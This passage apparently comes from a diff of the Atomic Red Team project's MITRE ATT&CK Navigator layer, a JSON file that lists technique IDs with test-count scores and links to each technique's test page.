Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":49,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.004/T1021.004.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":51,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View 